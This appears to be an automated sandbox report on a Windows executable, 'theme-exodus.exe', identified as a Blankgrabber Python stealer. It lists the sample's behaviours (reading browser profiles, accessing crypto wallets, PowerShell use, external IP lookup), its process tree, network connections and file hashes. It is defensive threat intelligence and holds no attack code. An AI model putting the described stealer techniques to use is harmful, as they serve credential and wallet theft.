Analysis Overview
SHA256
06e2aff15a8445cc3c955dcad2e957f1159198343c73ef3e3423e158eb1f9a91
Threat Level: Known bad
The file theme-exodus.exe was found to be: Known bad.
Malicious Activity Summary
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Executes dropped EXE
UPX packed file
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Hide Artifacts: Hidden Files and Directories
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Gathers system information
Suspicious use of WriteProcessMemory
Runs ping.exe
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Enumerates processes with tasklist
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Detects videocard installed
Views/modifies file attributes
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-23 07:24
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-23 07:24
Reported
2024-06-23 07:28
Platform
win7-20231129-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\theme-exodus.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\theme-exodus.exe
"C:\Users\Admin\AppData\Local\Temp\theme-exodus.exe"
C:\Users\Admin\AppData\Local\Temp\theme-exodus.exe
"C:\Users\Admin\AppData\Local\Temp\theme-exodus.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6909758,0x7fef6909768,0x7fef6909778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1304,i,6128774559211462054,3513063978999126292,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1516 --field-trial-handle=1304,i,6128774559211462054,3513063978999126292,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1604 --field-trial-handle=1304,i,6128774559211462054,3513063978999126292,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2096 --field-trial-handle=1304,i,6128774559211462054,3513063978999126292,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2104 --field-trial-handle=1304,i,6128774559211462054,3513063978999126292,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1320 --field-trial-handle=1304,i,6128774559211462054,3513063978999126292,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3280 --field-trial-handle=1304,i,6128774559211462054,3513063978999126292,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3384 --field-trial-handle=1304,i,6128774559211462054,3513063978999126292,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3712 --field-trial-handle=1304,i,6128774559211462054,3513063978999126292,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3644 --field-trial-handle=1304,i,6128774559211462054,3513063978999126292,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3384 --field-trial-handle=1304,i,6128774559211462054,3513063978999126292,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3616 --field-trial-handle=1304,i,6128774559211462054,3513063978999126292,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2380 --field-trial-handle=1304,i,6128774559211462054,3513063978999126292,131072 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | use.typekit.net | udp |
| US | 8.8.8.8:53 | website-cdn.ipinfo.io | udp |
| US | 8.8.8.8:53 | p.typekit.net | udp |
| US | 34.160.152.12:443 | website-cdn.ipinfo.io | tcp |
| US | 34.160.152.12:443 | website-cdn.ipinfo.io | tcp |
| US | 34.160.152.12:443 | website-cdn.ipinfo.io | tcp |
| US | 34.160.152.12:443 | website-cdn.ipinfo.io | tcp |
| US | 34.160.152.12:443 | website-cdn.ipinfo.io | tcp |
| US | 34.160.152.12:443 | website-cdn.ipinfo.io | tcp |
| SE | 184.31.15.48:443 | p.typekit.net | tcp |
| SE | 184.31.15.74:443 | use.typekit.net | tcp |
| US | 34.160.152.12:443 | website-cdn.ipinfo.io | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 34.117.186.192:443 | ipinfo.io | udp |
| US | 8.8.8.8:53 | js.hsforms.net | udp |
| SE | 184.31.15.74:443 | use.typekit.net | tcp |
| SE | 184.31.15.74:443 | use.typekit.net | tcp |
| SE | 184.31.15.74:443 | use.typekit.net | tcp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | tcp |
| US | 104.18.141.119:443 | js.hsforms.net | tcp |
| US | 8.8.8.8:53 | api.iconify.design | udp |
| US | 172.67.71.159:443 | api.iconify.design | tcp |
| SE | 184.31.15.74:443 | use.typekit.net | tcp |
| SE | 184.31.15.74:443 | use.typekit.net | tcp |
| SE | 184.31.15.74:443 | use.typekit.net | tcp |
| US | 8.8.8.8:53 | pixel.ipinfo.io | udp |
| US | 34.117.59.81:443 | pixel.ipinfo.io | tcp |
| US | 34.160.152.12:443 | website-cdn.ipinfo.io | udp |
| SE | 184.31.15.74:443 | use.typekit.net | tcp |
| SE | 184.31.15.74:443 | use.typekit.net | tcp |
| SE | 184.31.15.74:443 | use.typekit.net | tcp |
| US | 8.8.8.8:53 | static.ads-twitter.com | udp |
| US | 8.8.8.8:53 | a.quora.com | udp |
| US | 8.8.8.8:53 | js.hs-scripts.com | udp |
| US | 8.8.8.8:53 | tracking.g2crowd.com | udp |
| US | 162.159.152.17:443 | a.quora.com | tcp |
| US | 104.18.43.31:443 | tracking.g2crowd.com | tcp |
| US | 151.101.188.157:443 | static.ads-twitter.com | tcp |
| US | 104.16.141.209:443 | js.hs-scripts.com | tcp |
| US | 8.8.8.8:53 | js.stripe.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 151.101.192.176:443 | js.stripe.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| NL | 23.63.101.153:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| NL | 23.63.101.153:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| GB | 142.250.200.3:443 | www.google.co.uk | tcp |
| BE | 64.233.166.157:443 | stats.g.doubleclick.net | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | q.quora.com | udp |
| US | 8.8.8.8:53 | js.hsadspixel.net | udp |
| US | 8.8.8.8:53 | js.hubspot.com | udp |
| US | 8.8.8.8:53 | js.hs-analytics.net | udp |
| US | 8.8.8.8:53 | js.hs-banner.com | udp |
| US | 8.8.8.8:53 | js.hscollectedforms.net | udp |
| US | 52.86.138.164:443 | q.quora.com | tcp |
| US | 104.17.223.152:443 | js.hsadspixel.net | tcp |
| US | 104.16.117.116:443 | js.hubspot.com | tcp |
| US | 104.16.160.168:443 | js.hs-analytics.net | tcp |
| US | 172.64.153.27:443 | js.hs-banner.com | tcp |
| US | 104.16.110.254:443 | js.hscollectedforms.net | tcp |
| US | 8.8.8.8:53 | api.hubapi.com | udp |
| US | 8.8.8.8:53 | cta-service-cms2.hubspot.com | udp |
| US | 8.8.8.8:53 | forms.hscollectedforms.net | udp |
| US | 104.18.244.108:443 | api.hubapi.com | tcp |
| US | 8.8.8.8:53 | track.hubspot.com | udp |
| US | 8.8.8.8:53 | forms.hsforms.com | udp |
| US | 8.8.8.8:53 | perf-na1.hsforms.com | udp |
| US | 104.16.118.116:443 | track.hubspot.com | tcp |
| US | 104.18.80.204:443 | perf-na1.hsforms.com | tcp |
| US | 104.18.80.204:443 | perf-na1.hsforms.com | tcp |
| US | 8.8.8.8:53 | m.stripe.network | udp |
| DE | 99.86.4.50:443 | m.stripe.network | tcp |
| US | 8.8.8.8:53 | snap.licdn.com | udp |
| NL | 104.97.14.240:443 | snap.licdn.com | tcp |
| US | 8.8.8.8:53 | px.ads.linkedin.com | udp |
| US | 13.107.42.14:443 | px.ads.linkedin.com | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI23402\python311.dll
| MD5 | ccdbd8027f165575a66245f8e9d140de |
| SHA1 | d91786422ce1f1ad35c528d1c4cd28b753a81550 |
| SHA256 | 503cd34daed4f6d320731b368bbd940dbac1ff7003321a47d81d81d199cca971 |
| SHA512 | 870b54e4468db682b669887aeef1ffe496f3f69b219bda2405ac502d2dcd67b6542db6190ea6774abf1db5a7db429ce8f6d2fc5e88363569f15cf4df78da2311 |
memory/3056-23-0x000007FEF5AD0000-0x000007FEF60C2000-memory.dmp
\??\pipe\crashpad_2816_CSDWUHXUXCPUUAXS
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Temp\Tar987.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d5e3f581dda313662ec98d4036da6a53 |
| SHA1 | 3f97a063baf1fb9b6e883a283e2ca7e32142e85f |
| SHA256 | 75cd194c7bb57414350e64ac517ebb8aca65dc8f3a415983361503f96cb2ce73 |
| SHA512 | 8788982ff50d131b90c0009932e08b6c96bff7bb60a78c20bf8e324fcb030c0f9735b320c928980a72636d2899b57608dfdb8658bc0ad291af45395c579decfb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 5fb6edc9776b70d390205053a7e23cde |
| SHA1 | 21ed7f4539eb140f82568e53ace346cb74bdfa21 |
| SHA256 | 60325ea5886305a60647eced70a04f6212811aa39bc16f5bf499d19da0c388f8 |
| SHA512 | 159876759375ae9f5d1d08bfa50b3c95c9eb41027123a5bd7fc126f3c28e224194cf04e2cd2a9ca399dfe9677850223f3b4f9e17c0db7db063a15126f1b4f0fc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 64d48f598fd916a698f2f88c64e71ad0 |
| SHA1 | 7306c6fd3944f41f8a5ae7a96d80ae596ae7a773 |
| SHA256 | 6bc14d8cd4db4fee1581217d434571787d2ef100e9dcfc19837759516946a943 |
| SHA512 | 5a8fe8744228e920f1b59f77bc8b8e9c296fe18c78d40207f2ffcc28492804e5eea6f80ef67ae25b4bb206fd3839203f0732a724bbb02384e72f61cc35860d74 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a24a6bcf7ecf1cc07771a1d96e7fac54 |
| SHA1 | 463e2091f3990069db9ab4b2171f60e865f04b98 |
| SHA256 | bb2ba3f76b09c9431162ffee736456f24ec613ca1ab1f5d88d0e48715e40b824 |
| SHA512 | 072b1f163059917f3196b595a74f77dbcfdf66e2325631adbe175d08dcf24f89d22031a668be7675d37c5416c4303b0d604c5779e96f959af5c3c304405106fd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 146148f5af3ae721f02bac40bae037a5 |
| SHA1 | dc30ac897be291214f2bb63bdfb202db451cea6b |
| SHA256 | 348042bfb030eb319afb22f889cd29ee35cf631d1f2dcd82969889f27b7039b2 |
| SHA512 | 586c467751bd08f9e6855ff516635e8df47a09946df491d30eee849ff6a938f5af9f4f1f63d9bd1716924fe336bab0cffe634eee190d6a2e94b825cb8f1cf53f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 804f4e74f6a984a62319299851b0d61e |
| SHA1 | 46b7918ebb169296a929c249482afb9d322aeb1d |
| SHA256 | f92267303dbce4a357835152edc1e86d3fb9e3da8e947e88b77cb077df7108b9 |
| SHA512 | 070b440f87c0df2844f9c235f21255a4b4bb0383c29a06abba80849ea4be1774e31b8b4adbcd1e504140503ea08e15920d31fa8e173bd30bb2ed3379e608b8bf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7f980862bc931a081af1b63cc75d852e |
| SHA1 | aabafbfd0f0542e5337276cf23ebee45742b7dac |
| SHA256 | ac59ead0c273b1fe104fa4a27964238ed3206f82b576a19df5835acae2bcb7f7 |
| SHA512 | b4a2e78c632b55cd00a2f2681cbb39fadd7b4c46a4a116ec45d352965604f51189edf469ea2fc107c99d30b4c980bd9f28d568d108d37c444fb058532d88c089 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c764d5e60d98e0f35230486b9a0989ea |
| SHA1 | 3aaf6ead48f5e0c0e0c3e0f33b0a455d0faf18dc |
| SHA256 | ef1a63cada8faf3ba77fe9691aa1365492273cd4c54d76f21fb777ef09baa6b5 |
| SHA512 | 9f56b371f6e8531a62b2f83a973c16d44ad9849ac69e3ae566369b540b096e9dc5b3eb96eee553d6b05efac9354b23c29baaa2f2a512f567577f157a1aa2f122 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c1c88db336bebbec509f0ee99e9632d1 |
| SHA1 | 15033eef8e5d9cb9c6ab3b24d2d2417ed563b068 |
| SHA256 | cadfa966ea7e195e6887a256aab305f7f5c3ef4dbb3a844d0786babcfd8781f2 |
| SHA512 | f46b4214c928f196b03bd09fe3b4eb9c96232359f864779caebba054cebd1da5ce968aa34b5f1459355be73711c85c94d4d84d85ae5dbce39cfadc812cd5d51c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ec3bc13b920ee9ea775a59539d47686b |
| SHA1 | a7826126f7f97dd49869d46c3ab14b971c676336 |
| SHA256 | 38f2be4712bdefb4c7bf090fd06330de224e53180cf2c5ef36a623504dc346c9 |
| SHA512 | 66a33de94647857760af03d5139f485d0da05637fa83a9adfdb261d2263874d61d1415f4b09bacaabf8c7f5eff98402f25c5fbb6995da3013a0124627d845708 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | 1bd20202c009830088895461594dbcbd |
| SHA1 | 6b2cb108c8e93fa0c491b81666691fb9913dee30 |
| SHA256 | bdb3e29404139f30e249e8289b657abfb8e256252d01bafdc6aa8644c5b21a45 |
| SHA512 | de55a180b4e24dd3a661f4470f1c573becab9c0b6c81656a913723b5e799ede642f11650257ca23a5ddb203d806d7addbc3a75e7d2cd0ca18a97b62e5e04a70d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | e4a68ac854ac5242460afd72481b2a44 |
| SHA1 | df3c24f9bfd666761b268073fe06d1cc8d4f82a4 |
| SHA256 | cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f |
| SHA512 | 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ab2073c2bc4174255c8dc07d8d792d3a |
| SHA1 | 647c80d2d73c3beae121edd2a9d5bc4a2a0aef0b |
| SHA256 | b089f73ec44e02308e88010f35cdc12cc8d3d3a5cd20bf3c94ab7a27e43c365b |
| SHA512 | 93516ab3731cfafe97e2c72d559068d129f598d529bf7ddf4cbb80900fbc853380923b5e0d9d35f43464d44c58dab43d49a08eadc7c1a3e6c42dd4197f98b3f4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b41c1a00b42003e582e0f819b3da7d89 |
| SHA1 | 82399d90692970bb0bbbfb16c05cdda7775bcb08 |
| SHA256 | f9d9fccfa076313b6b9f8984fd0638e9b40f6ad7149375449fb73b7cf01874ec |
| SHA512 | 95e184f73b567cf6d2c98be56d2be678917ad4de3aae6e9487697758037c39dff4bc8f5a0ca167fa26a8d91270d8fcf298eb84ab648913500cf317b61881bb34 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | a297ca2425f3fd08bded5d0d61a9521a |
| SHA1 | 7c89875473fd2e400441e7870d7af576dc2993fb |
| SHA256 | 8dbe89a2ed11377ab0f13366192ac98e7e37e60196f94a0a8dfb24052af76629 |
| SHA512 | 0de1e4490d7b94de7af3f36e62595dd750214a355e519908d854cde731bcfe3bb89ade3ed9852d687d39f3ddd66f19aeed18f6866ca1424984ed01644e30fba4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 43eaa6d8b74a03a6356742c2430cacd0 |
| SHA1 | 2a17f437990019c341154a976d4c51d81c07d904 |
| SHA256 | c2686a6b27894792d3909a64580739f4fe31dee8299ac6fd9ea43e10fee1aeb6 |
| SHA512 | 6b073f24347f9d215a65663e9a0248cceea1a3b499e38f7e2918740c50175468277b0293db41b5055b443518fae355fc8b0a0466c7c610c6a87e2f534844c12f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\19c6e177-077f-4a7f-91aa-8a85e8e81046.tmp
| MD5 | 8aa5628f83ff77c018019fae7e12f68c |
| SHA1 | 3725c66b5ba409768856912056ed58e217969d23 |
| SHA256 | f015350d0e7014d002a873fad30f6f18e98e4736c0a8460f9e53c90e41a957aa |
| SHA512 | 54c80d558d00125c8b96515bb0cf1dde57d789a9512fef971afc8f32c6bb8582aeb8badd2e9b9d0e798c67f2a48ae79a4b48323f9c90e427e447367f02d76790 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-23 07:24
Reported
2024-06-23 07:28
Platform
win10v2004-20240508-en
Max time kernel
92s
Max time network
93s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI18442\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
